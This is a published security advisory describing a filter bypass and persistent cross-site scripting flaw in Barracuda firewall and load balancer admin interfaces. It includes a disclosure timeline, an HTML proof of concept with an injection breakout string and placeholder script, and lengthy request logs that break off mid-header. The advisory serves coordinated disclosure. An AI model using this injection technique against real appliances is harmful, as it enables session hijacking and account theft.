BugTraq
Barracuda Networks Web Application Firewall v6.1.5 & LoadBalancer v4.2.2 #37 - Filter Bypass & Multiple Vulnerabilities Jul 29 2014 11:36AM
Vulnerability Lab (research vulnerability-lab com)

Document Title:
===============
Barracuda Networks Web Application Firewall v6.1.5 & LoadBalancer v4.2.2
#37 - Filter Bypass & Multiple Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1103

Barracuda Networks Security ID (BNSEC): BNSEC-1263
https://www.barracuda.com/support/knowledgebase/501600000013gvr

Solution #00006523
BNSEC-01263: Authenticated persistent XSS in Barracuda Load Balancer v4.2.2

Release Date:
=============
2014-07-28

Vulnerability Laboratory ID (VL-ID):
====================================
1103

Common Vulnerability Scoring System:
====================================
3.9

Product & Service Introduction:
===============================
The Barracuda Firewall goes beyond traditional network firewalls and
UTMs by providing powerful network security,
granular layer 7 application controls, user awareness and secure VPN
connectivity combined with cloud-based malware
protection, content filtering and reporting. It alleviates the
performance bottlenecks in Unified Threat Management
(UTM) appliances through intelligent integration of on-premise and
cloud-based technologies. While the powerful on-
premises appliance is optimized for tasks like packet forwarding and
routing, Intrusion Prevention (IPS), DNS/DHCP
services and site-to-site connectivity; CPU intensive tasks like virus
scanning, content filtering and usage
reporting benefit from the scalable performance and elasticity of the cloud.

(Copy o the Vendor Homepage: https://www.barracuda.com/products/firewall )

The Barracuda Load Balancer ADC is ideal for organizations looking for a
high-performance, yet cost-effective
application delivery and security solution. With the broadest range of
hardware and virtual models, the Barracuda
Load Balancer ADC provides maximum flexibility for organizations looking
to build highly secure and scalable
application infrastructure, whether itâ??s deployed on-premises or in the
cloud.

(Copy o the Vendor Homepage:
https://www.barracuda.com/products/loadbalancer )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple
persistent vulnerabilities in the Barracuda Networks Firewall v6.1.0.016
& Loadbalancer v4.2.2 Application.

Vulnerability Disclosure Timeline:
==================================
2013-09-30: Researcher Notification & Coordination (Benjamin Kunz Mejri
& Ebrahim Hegazy)
2013-10-01: Vendor Notification (Barracuda Networks Security Team - Bug
Bounty Program)
2013-11-29: Vendor Response/Feedback (Barracuda Networks Security Team -
Bug Bounty Program)
2014-07-14: Vendor Fix/Patch (Barracuda Networks Developer Team)
2014-07-28: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Barracuda Networks
Product: Firewall Appliance Web-Application v6.1.0.016, v6.1.2, v6.1.5 -
x100 x200 x300 x400 x500 x600 & Vx

Barracuda Networks
Product: Load Balancer Appliance Web-Application v4.2.2 & Vx

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Barracuda Networks Firewall v6.1.0.016 & Loadbalancer
v4.2.2 Application.
The vulnerability allows remote attackers to implement via inject own
malicious persistent (application side) script codes to the
online-service module.

The vulnerabilities are located in the `Firewall > Firewall Rules >
Custom Firewall Access Rules > Access Rules` module. Attackers are able
to inject
via POST method request through the `ip address` or `redirect to` values
own malicious script codes. The attack vector is persistent on the
application-side
of the service and the request method to inject is POST.The local
privileged barracuda user account can inject own malicious context by
usage of the `ip`
and `redirect` to input fields. The execution of the script code after
the inject occurs in the same `item listing` after processing to add.

The input fields have an input filter restriction which can be bypassed
by direct manipulation of the POST method request via live session
tamper. The vulnerable
module input form with the restriction notifies the user by a red
highlighted status message. The attacker only needs to click twice the
service plus button to
bypass the validation mechanism and can at the end add the own malicious
context. The script code executes on the application-side of the
barracuda network
firewall and loadbalancer appliance application.

The security risk of the bypass and persistent input validation
vulnerabilities are estimated as medium with a cvss (common
vulnerability scoring system) count of 3.9.
Exploitation of the persistent web vulnerability requires low user
interaction and a local privileged web-application account. Successful
exploitation of the vulnerability
can lead to persistent session hijacking (customers), account steal via
persistent web attacks, persistent phishing or persistent manipulation
of module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Firewall > Firewall Rules > Custom Firewall Access Rules > Access Rules

Vulnerable Input Field(s):
[+] Source & Destination > IP Address
[+] Source & Destination > Redirect to

Vulnerable Parameter(s):
[+] value

Affected Module(s):
[+] Ip Listing
[+] Redirect Information Listing (buttom)

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with low privileged application user account and
low user interaction. For security demonstration or to reproduce the
security vulnerability follow the provided information and steps
below to continue.

PoC: Firewall > Firewall Rules > Custom Firewall Access Rules > Access
Rules (Source & Destination) - IP & Redirect to

<table class="config_module_inner" summary="Config Module"
cellpadding="0" cellspacing="0" width="100%">
<tbody id="dst_net_ip_obj_radio">
<tr class="config_module_tr" id="config_module_row_1">
<td colspan="2" valign="top" width="100"><span class="nowrap"><input
autocomplete="off"
checked="checked" id="fw_access_rule_dst_net_type:IP Addresses"
name="fw_access_rule_dst_net_type" onclick="switch_dst_mode(this.value)"
value="IP Addresses" type="radio"><label
for="fw_access_rule_dst_net_type:IP Addresses">IP Address</label></span>
​<span class="nowrap">
<input autocomplete="off" id="fw_access_rule_dst_net_type:Network
Objects" name="fw_access_rule_dst_net_type"
onclick="switch_dst_mode(this.value)"
value="Network Objects" type="radio"><label
for="fw_access_rule_dst_net_type:Network Objects">Network
Objects</label></span> ​</td>
</tr></tbody>
<tbody>
<tr class="config_module_tr" id="config_module_row_2">
<td colspan="2" valign="top" width="100"><table class="config_module"
frame="box" id="dst_inclist" rules="none"
style="border:none;" summary="Box" cellpadding="0" cellspacing="0">
<tbody><tr><td><input value="'">>"<[PERSISTENT INJECTED SCRIPT CODE!]> <"
data-tooltip-linked="2" class="field-error" autocomplete="off"
data-displayfield="fw_access_rule_dst_inc"
id="JS_fw_access_rule_dst_inc_single"
name="UPDATE_fw_access_rule_dst_inc_single" style="width:180px;"
type="text"></td><td><input class="new_button" id="add_dst_inc_button"
name="+"
onclick="add_dst_inc_pattern(1);" value="+" type="button"></td></tr><tr
style="display: none;"><td><select disabled="" autocomplete="off"
id="dst_nobjs_inc" name="dst_nobjs_inc" style="width:180px;"><option
selected="selected" title="All IPv4 addresses.
Include: 0.0.0.0/0" value="Any">Any</option><option title="All routed
IPv4 addresses.
Include: Any
Exclude: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16"
value="Internet">Internet</option><option title="All network addresses
that have a Trusted
classification. This automatically applies to the management network.
Include: Trusted LAN Networks, Trusted Next-Hop Networks" value="Trusted
LAN">Trusted LAN</option><option title="Assigned local IP for an
established UMTS link" value="3G Local IP">3G Local IP</option><option
title="All Addresses configured or dynamically assigned on the Firewall
Include: Management IP, Service IPs, DHCP1 Local IP, DHCP2 Local IP,
DHCP3 Local IP, ..." value="All Firewall IPs">All Firewall IPs</option>
<option title="IP addresses of all servers used for Active Directory
type authentication" value="Auth-ACTDIR">Auth-ACTDIR</option>
<option title="IP addresses of all servers used for LDAP type
authentication" value="Auth-LDAP">Auth-LDAP</option><option title="IP
addresses
of all servers used for MSNT type authentication"
value="Auth-MSNT">Auth-MSNT</option><option title="IP addresses of all
servers used for
RADIUS type authentication"
value="Auth-RADIUS">Auth-RADIUS</option><option title="IP addresses of
all servers used for RSA-SecureID type
authentication"
value="Auth-RSASecureID">Auth-RSASecureID</option><option
title="Include: 205.158.110.60, 216.129.105.0/24, 216.129.125.192/26,
209.124.61.96/27, 209.124.62.64/27, ..." value="Barracuda Update
Servers">Barracuda Update Servers</option><option title="Assigned local
IP for
established DHCP based link on dhcp1" value="DHCP1 Local IP">DHCP1 Local
IP</option><option title="Assigned local IP for established DHCP based
link on dhcp2" value="DHCP2 Local IP">DHCP2 Local IP</option><option
title="Assigned local IP for established DHCP based link on dhcp3"
value="DHCP3 Local IP">DHCP3 Local IP</option><option title="Assigned
local IP for established DHCP based link on dhcp4" value="DHCP4 Local IP">
DHCP4 Local IP</option><option title="Assigned local IP for established
DHCP based link on dhcp5" value="DHCP5 Local IP">DHCP5 Local IP</option>
<option title="Assigned local IP for established DHCP based link on
dhcp6" value="DHCP6 Local IP">DHCP6 Local IP</option>
<option title="All networks classified as DMZ" value="DMZ Networks">DMZ
Networks</option><option title="IP addresses of master servers used by
the firewall for DNS zone transfers" value="DNS Master Server">DNS
Master Server</option><option title="IP addresses of servers used by the
firewall for DNS queries" value="DNS Servers">DNS
Servers</option><option title="Assigned local IP for established DSL
link through ppp1"
value="DSL1 Local IP">DSL1 Local IP</option><option title="Assigned
local IP for established DSL link through ppp2" value="DSL2 Local IP">
DSL2 Local IP</option><option title="Assigned local IP for established
DSL link through ppp3" value="DSL3 Local IP">DSL3 Local IP</option>
<option title="Assigned local IP for established DSL link through ppp4"
value="DSL4 Local IP">DSL4 Local IP</option>
<option title="All locally attached static networks
Include: 0.0.0.0/0" value="Local Networks">Local
Networks</option><option title="The firewall's management IP address
Include: 192.168.200.200" value="Management IP">Management
IP</option><option title="IP addresses of servers used by the firewall
for NTP time
synchronisation" value="NTP Time Server">NTP Time Server</option><option
title="Include: 0.0.0.0/0 (p1)" value="Port-p1">Port-p1</option>
<option title="Include: 0.0.0.0/0 (p2)"
value="Port-p2">Port-p2</option><option title="Include: 0.0.0.0/0 (p3)"
value="Port-p3">Port-p3</option>
<option title="Include: 0.0.0.0/0 (p4)"
value="Port-p4">Port-p4</option><option title="Private class A network.
Include: 10.0.0.0/8" value="Private 10">Private 10</option><option
title="16 private class B networks.
Include: 172.16.0.0/12" value="Private 172">Private 172</option><option
title="Private class B network.
Include: 192.168.0.0/16" value="Private 192">Private 192</option><option
title="Root DNS server addresses
Include: 198.41.0.4, 128.9.0.107, 192.33.4.112, 128.8.10.90,
192.203.230.10, ..." value="Root DNS">Root DNS</option>
<option title="All configured server IP addresses
Include: 127.0.0.9" value="Service IPs">Service IPs</option><option
title="All trusted local area networks
Include: 0.0.0.0/0" value="Trusted LAN Networks">Trusted LAN
Networks</option><option title="All trusted networks that
are reachable through a next-hop." value="Trusted Next-Hop
Networks">Trusted Next-Hop Networks</option></select></td>
<td><input disabled="" class="new_button" id="add_dst_inc_button"
name="+" onclick="add_dst_inc_pattern(1);" value="+"
type="button"></td></tr>
<tr class="network"><td>'">>" >"<[PERSISTENT INJECTED SCRIPT CODE!]></td>
<td><input class="new_button" value="-" name="incip^'">>"<[PERSISTENT
INJECTED SCRIPT CODE!])
[PERSISTENT INJECTED SCRIPT CODE!]> <"
type="button"></td></tr></tbody></table></td>
</tr>
</tbody>
<tbody id="redir_redirected_to_select" style="display:none">
<tr class="config_module_tr" id="config_module_row_3">
<td valign="top" width="100"> </td>
<td valign="top"> </td>
</tr>
<tr class="config_module_tr" id="config_module_row_4">
<td valign="top" width="100">Redirected To:</td>
<td valign="top"><select disabled="" autocomplete="off"
id="UPDATE_new_fw_access_rule_redir_to"
name="UPDATE_new_fw_access_rule_redir_to"
onchange="update_redir_to_info(this.value);" style=""><option
selected="selected"
value="Caching DNS">Caching DNS</option><option
value="SIP">SIP</option><option value="Proxy">Proxy</option><option
value="NTP">
NTP</option><option value="VPN">VPN</option><option value="SSL VPN">SSL
VPN</option></select></td>
</tr>
</tbody>
<tbody>
</tbody>
<tbody id="redir_redirected_to_ip_input" style="display:none">
<tr class="config_module_tr" id="config_module_row_5">
<td valign="top" width="100"> </td>
<td valign="top"> </td>
</tr>
<tr class="config_module_tr" id="config_module_row_6">
<td valign="top" width="100">Redirected To:</td>
<td valign="top"><input disabled="" autocomplete="off"
id="UPDATE_new_fw_access_rule_redir_to"
name="UPDATE_new_fw_access_rule_redir_to" type="text"></td>
</tr>
</tbody>
<tbody>
</tbody>
</table>

--- PoC Session Logs Request/Response [GET|POST] ---

2:35:05.529[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.529[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.530[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/scriptaculous/scriptaculous.js?loa
d=effects,dragdrop&v=6.1.0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.530[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/ext-prototype-adapter.js?v=6.1.0.0
16
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.531[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-all.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.532[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js_functions.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.533[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-ux.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.534[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/slider.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.535[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/prototype.helper.js?v=6.1.0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.536[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/prototype.ajaxvalidation.js?v=6.1.
0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.537[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/utils.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.537[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/js/adapters/prototype-adapter.js?v=6.
1.0.016
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.538[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/highcharts.js?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.556[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]

2:35:05.613[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]

2:35:05.654[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/effects.js Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.655[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/dragdrop.js Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.944[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/loading-spinner.gif
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.945[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/boxnet-spinner.gif
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.945[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/ha-spinner.gif Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:05.948[308ms][total 308ms] Status: 200[OK]
GET https://firewall.ptest.cudasvc.com/cgi-mod/header_logo.cgi?6.1.0.016
Load Flags[LOAD_NORMAL] Content Size[-1] Mime Type[image/png]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[image/png]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Tue, 01 Oct 2013 00:35:06 GMT]
Date[Tue, 01 Oct 2013 00:35:06 GMT]
Cache-Control[no-cache, no-store]

2:35:06.103[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/loading_anim.gif Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:06.104[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/port_greenON_yellowON.png
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:06.105[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/images/port_greenOFF_yellowOFF.png
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:06.106[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/port_greenON_yellowOFF.png
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:06.146[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/green.png Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016]

2:35:06.146[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/meter_bg.gif Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/progress.css?v=6.1.0.016]

2:35:06.148[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/meter_g.gif Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/progress.css?v=6.1.0.016]

2:35:07.285[0ms][total 0ms] Status: pending[]
GET
https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?ajax_action=build_s
tatus_expiration_display_content&jsonp=update_subscription_module&locale
=en_US
Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]

2:35:09.169[1999ms][total 4455ms] Status: 200[OK]
GET
https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=
1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=g
uest&primary_tab=FIREWALL
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content
Size[64957] Mime Type[text/html]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Mon, 01 Oct 2012 00:35:11 GMT]
Date[Tue, 01 Oct 2013 00:35:11 GMT]
Content-Length[64957]

2:35:11.270[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/barracuda.css?v=6.1.0.016 Load
Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
